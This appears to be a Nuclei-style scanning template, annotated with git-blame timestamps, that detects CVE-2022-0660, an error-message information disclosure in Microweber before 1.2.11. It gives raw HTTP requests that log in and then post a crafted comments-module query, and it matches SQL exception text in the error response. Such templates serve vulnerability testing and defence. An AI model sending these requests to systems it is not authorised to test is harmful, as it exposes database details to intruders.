2022-08-03 10:54:02 +00:00
id : CVE-2022-0660
info :
2023-04-06 19:16:37 +00:00
name : Microweber <1.2.11 - Information Disclosure
2022-08-04 11:19:27 +00:00
author : amit-jd
2022-08-03 10:54:02 +00:00
severity : high
2022-08-03 13:50:49 +00:00
description : |
2023-04-06 19:16:37 +00:00
Microweber before 1.2.11 is susceptible to information disclosure. An error message is generated in microweber/microweber which contains sensitive information while viewing comments from load_module:comments#search=. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
2022-08-03 10:54:02 +00:00
reference :
- https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291/
- https://github.com/advisories/GHSA-hhrj-wp42-32v3
2022-08-04 10:52:09 +00:00
- https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291
2023-04-06 22:41:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-0660
2022-08-03 10:54:02 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-08-12 00:56:42 +00:00
cve-id : CVE-2022-0660
2022-08-03 10:54:02 +00:00
cwe-id : CWE-209
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
epss-score : 0.0053
2022-08-03 13:50:49 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-06-04 08:13:42 +00:00
verified : true
2022-08-27 04:41:18 +00:00
tags : cve2022,microweber,disclosure,authenticated,huntr,cve
2022-08-03 10:54:02 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-08-03 10:54:02 +00:00
- raw :
- |
POST /api/user_login HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
username={{username}}&password={{password}}
2022-08-03 13:50:49 +00:00
2022-08-03 10:54:02 +00:00
- |
POST /module/ HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
Referer : {{BaseURL}}admin/view:comments
class=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}}
req-condition : true
cookie-reuse : true
matchers :
- type : dsl
dsl :
- contains(body_2,'QueryException')
- contains(body_2,'SQLSTATE')
- contains(body_2,'runQueryCallback')
- 'contains(all_headers_2,"text/html")'
- 'status_code_2==500'
2022-08-03 13:50:49 +00:00
condition : and
2023-04-06 19:16:37 +00:00
# Enhanced by md on 2023/04/06